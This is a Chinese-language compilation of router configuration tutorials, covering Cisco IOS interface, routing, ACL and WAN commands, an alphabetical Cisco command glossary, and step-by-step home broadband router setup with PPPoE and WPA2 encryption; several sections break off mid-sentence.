router(config-line)#login /使能可以登陆 2、接口配置： router(config)#int s0 /进入接口配置模式 serial 0 端口配置（如果是模块化的路由器前面加上槽位编号，例如serial0/0 代表这个路由器的0槽位上的第一个接口） router(config-if)#ip add xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx /添加ip 地址和掩码router(config-if)#enca hdlc/ppp 捆绑链路协议 hdlc 或者 ppp 思科缺省串口封装的链路层协议是HDLC所以在show run配置的时候接口上的配置没有，如果要封装为别的链路层协议例如PPP/FR/X25就是看到接口下的enca ppp或者enca fr router(config)#int loopback /建立环回口(逻辑接口)模拟不同的本机网段 router(config-if)#ip add xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx /添加ip 地址和掩码给环回口 在物理接口上配置了ip地址后用no shut启用这个物理接口反之可以用shutdown管理性的关闭接口 3、路由配置： (1)静态路由 router(config)#ip route xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx 下一条或自己的接口router(config)#ip route 0.0.0.0 0.0.0.0 s 0 添加缺省路由 (2)动态路由 rip协议 router(config)#router rip /启动rip协议 router(config-router)#network xxx.xxx.xxx.xxx /宣告自己的网段 router(config-router)#version 2 转换为rip 2版本 router(config-router)#no auto-summary /关闭自动汇总功能，rip V2才有作用 router(config-router)# passive-int 接口名 /启动本路由器的那个接口为被动接口

思科路由器基本配置与常用配置命令

思科路由器基本配置与常用配置命令(simple for CCNA) 启动接口，分配IP地址： router> router> enable router# router# configure terminal router(config)# router(config)# interface Type Port router(config-if)# no shutdown router(config-if)# ip address IP-Address Subnet-Mask router(config-if)# ＾z 配置RIP路由协议：30秒更新一次 router(config)# router rip router(config-if)# network Network-Number router(config-if)# ＾z 配置IGRP路由协议：90秒更新一次 router(config)# router igrp AS-Number router(config-if)# network Network-Number router(config-if)# ＾z配置Novell IPX路由协议：Novell RIP 60秒更新一次 router(config)# ipx routing [node address] router(config)# ipx maximum-paths Paths router(config)# interface Type Port router(config-if)# ipx network Network-Number [encapsulation encapsulation-type] [secondary] router(config-if)# ＾z配置DDR： router(config)# dialer-list Group-Number protocol Protocol-Type permit [list ACL-Number] router(config)# interface bri 0 router(config-if)# dialer-group Group-Number router(config-if)# dialer map Protocol-Type Next-Hop-Address name Hostname Telphone-Number router(config-if)# ＾z配置ISDN： router(config)# isdn swith-type Swith-Type router(config-if)# ＾z 配置Frame Relay： router(config-if)# encapsulation frame-relay [cisco | ietf ] router(config-if)# frame-relay lmi-type [ansi | cisco | q933a ] router(config-if)# bandwidth kilobits router(config-if)# frame-relay invers-arp [ Protocol ] [dlci ] router(config-if)# ＾z配置标准ACL： router(config)# access-list Access-List-Number [ permit | deny ] source [ source-mask ] router(config)# interface Type Port router(config-if)# ip access-group Access-List-Number [ in | out ] router(config-if)# ＾z配置扩展ACL： router(config)# access-list Access-List-Number [ permit | deny ] [ Protocol | Protocol-Number ] source source-wildcard [ Source-Port ] destination destination-wildcard [ Destination-Port ] [ established ]

路由器配置连接过程

路由器连接配置方法过程 （先看说明再看图按图上的方法设置非常简单只需六步即可设置好） 一、电话线，网线连接猫和电脑的示意图： （方法：从家用猫原来连到电脑上的网线拨下后连接到无线路由器WAN口，即路由器蓝色口。从路由器四个黄色口任意选一口连一根网线连到计算机上，网线在路由器盒子里备好的有一根连上就行，连接工作准备完必。） 二、路由器设置方法（图文）： [不能忽略每一步必须按以下说明操作到第7步即可设置成功] 按以上方法边接好后，现在打开电脑，进行路由器配置。 1、连好后确认一下有没有连错。连接没有问题后打开电脑。打开浏览器，在浏览器中 输入：.1此时会提示你输入帐号密码后打回车键(Enter)（如图所示）在帐号密码里 输入：admin （小写、帐号密码都一样）(默认的帐号密码均为小写的：admin) 2、此时就打开了路由器界面（如图所示） 3、在路由器界面左边菜单找到“网络设置”点一下。点开后再点一下“MAC地址克隆” 点开它，点开后。直接点“克隆MAC地址”这个按钮（如图所示），克隆点完后。 点下面的“保存”点完保存按钮后。再进行下一步设置。

4、点完保存后。点左边菜单的“设置向导”（如图所示）点下一步进行设置，在上网 方式中选择“PPPoE（ADSL虚拟拨号）”后点下一步。 5、点下一步后进入设置上网帐号密码对话框。此时你需要输入你家拨号上网的宽带帐 号和密码，分别在帐号和密码框中输入。输入完，确认正确后点“下一步”。如果是电信的宽带默认密码是：帐号为你家的座机电话号码前面加0931 。 6、点下一步会自动路转到无线设置界面。（如图所示）无线状态选择“开启”，SSID是 无线信号的名称，这里可以随便起个名字。但必须是英文名。信道选择“自动”，模式选择“11bga mixde”（这个方式无线信号可以覆盖十层楼，且无线信号可以穿5层墙壁）。频段带宽选择“自动”。最大发送率选择“300MBPS”。选择完后。进入无线安全选项，为了防止别人盗用你的无线网络，对网络进行加密操作。（如图所示）。选择加密方式为“WPA-PSK/WPA2-PSK”。在PSK密码框中输入字母加数字的密码，但必须大于8位小于64位。（区分大小写）下图有演示。输入完后点“下一步” 7、点下一步后会出现话框，此时点“重启”路由器设置就设置完了。接下来就可以上 网了。 8、全部设置完，且路由器启动完成后。点左侧菜单的运行状态菜单查看网络是否已经

cisco路由器配置教程

Cisco路由器配置教程 翻译：何高卓(2001-04-19 14:28:01) Josh Gentry, 1999年9月6日，v.99 翻译：何高卓1999.12.10 -------------------------------------------------------------------------------- 本人声明：本人本着“我为人人，人人为我”的宗旨翻译了此文。本文仅为阁下提供参考。 如果由于本人在翻译过程中的疏忽和错误造成阁下经济上或精神上的损失，本人 只能深表遗憾而拒绝承担一切责任。 -------------------------------------------------------------------------------- 本文覆盖了使用命令行界面的基本的Cisco路由器IP地址配置 -------------------------------------------------------------------------------- 感谢 以下的资源非常有用： Leinwand、Pinsky和Culpepper。Cisco路由器的配置。印第安纳州印第安纳波利斯：Cisco公司出版，1998。Cisco系统公司， 感谢Newman给我上了配置Cisco路由器的第一节课。 本文的信息原先搜集于，或者说得自于James Hart先生所完成的计划。他在Albuquerque,NM（美国新墨西哥州）的技术/职业学院教师。非常感谢他允许我参加该计划的工作。 弃权书 本文的传播无须明确或含蓄的授权，对本文包含的信息的正确性亦不作任何担保。本文仅提供给需要帮助的人使用，但使用者必须自己承担风险。如果使用者由于使用本文而造成的任何损失作者和TVI（技术/职业学院）概不负责。 约定

思科路由器常用配置命令大全

思科路由器常用配置命令大全 本文按字母顺序列举了思科路由器常用配置命令，适合思科路由器操作人员随时查看 Access-enable允许路由器在动态访问列表中创建临时访问列表入口 Access-group把访问控制列表(ACL)应用到接口上 Access-list定义一个标准的IP ACL Access-template在连接的路由器上手动替换临时访问列表入口 Appn向APPN子系统发送命令 Atmsig 执行ATM信令命令 B 手动引导操作系统 Bandwidth 设置接口的带宽 Banner motd 指定日期信息标语 Bfe 设置突发事件手册模式 Boot system 指定路由器启动时加载的系统映像 Calendar 设置硬件日历 Cd 更改路径 Cdp enable 允许接口运行CDP协议 Clear 复位功能 Clear counters 清除接口计数器 Clear interface 重新启动接口上的件逻辑 Clockrate 设置串口硬件连接的时钟速率，如网络接口模块和接口处理器能接受的速率 Cmt 开启/关闭FDDI连接管理功能 Config-register 修改配置寄存器设置 Configure 允许进入存在的配置模式，在中心站点上维护并保存配置信息 Configure memory 从NVRAM加载配置信息 Configure terminal 从终端进行手动配置 Connect 打开一个终端连接 Copy 复制配置或映像数据 Copy flash tftp 备份系统映像文件到TFTP服务器 Copy running-config startup-config 将RAM中的当前配置存储到NVRAM Copy running-config tftp 将RAM中的当前配置存储到网络TFTP服务器上 Copy tftp flash 从TFTP服务器上下载新映像到Flash Copy tftp running-config 从TFTP服务器上下载配置文件 Debug 使用调试功能 Debug dialer 显示接口在拨什么号及诸如此类的信息 Debug ip rip 显示RIP路由选择更新数据 Debug ipx routing activity 显示关于路由选择协议(RIP)更新数据包的信息 Debug ipx sap 显示关于SAP（业务通告协议）更新数据包信息 Debug isdn q921 显示在路由器D通道ISDN接口上发生的数据链路层（第2层）的访问过程 Debug ppp 显示在实施PPP中发生的业务和交换信息 Delete 删除文件 Deny 为一个已命名的IP ACL设置条件 Dialer idle-timeout 规定线路断开前的空闲时间的长度 Dialer map 设置一个串行接口来呼叫一个或多个地点 Dialer wait-for-carrier-time 规定花多长时间等待一个载体 Dialer-group 通过对属于一个特定拨号组的接口进行配置来访问控制 Dialer-list protocol 定义一个数字数据接受器（DDR）拨号表以通过协议或ACL与协议的组合来控

网通-路由器设置方法

网通-路由器设置方法 一、在配置之前，先简单说明下什么是静态IP、什么是动态IP。 静态IP是指有固定的IP地址，不用虚拟拨号就直接联入internet 通过Modem、ISDN、ADSL、有线宽频、小区宽频等方式上网的计算机，每次上网所分配到的IP地址都不相同，这就是动态IP地址。因为IP地址资源很宝贵，大部分用户都是通过动态IP地址上网的。普通人一般不需要去了解动态IP地址，这些都是计算机系统自动完成的。 今天我们拿一款很常见的路由器来做示范，那就是TP-Link的TL－ R402MSOHO型路由器。 二、网线的接法：

1.adsl猫与路由器的连接：一般家庭所用路由器，有五个口，即一个WAN口，四个LAN口，adsl猫出来的网线自然要接入到WAN口了！ 2.电脑与路由器的连接：WAN口被接入了，那么就剩下LAN口就是为电脑所用的了！四个口怎么接都可以，如果你有超过4台以上的电脑，那么直接加交换机就可以了，加一根路由跟交换机之间的连通线就可以了！ 三、开始设置(记得把线都接好了哦！别忘了开路由器) 1.任意一台电脑：将IP地址改为自动获取IP（右击网上邻居属性-右击本地连接属性-将Internet 协议双击-选择自动获取ip地址/自动获得DNS服务器地址！然后确定-再确定！）

一般过了几秒种，你就发现右下角提示本地连接已连接或是带黄色惊叹符的本地连接图标没有了，这说明你已经跟路由器连接了，自然就是自动获取了路由器分配给你的IP地址了！ 2.获取路由器地址：既然已经连接，我们就来设置路由器吧！怎么设置呢？一般家庭级的路由器都是用过web页面来设置，那么它的“主页面”地址是什么呢？我们再来操作这台电脑，右击网上邻居属性-双击本地连接属性，出现了本地连接状态的对话框，点击“支持”，看到默认网关了吗？对了，这个就是路由器的地址了!(一般路由器的这个IP为192.168.1.1或是192.168.0.1) 3.打开IE浏览器，在地址栏里输入刚才咱们看到的默认网关的地址！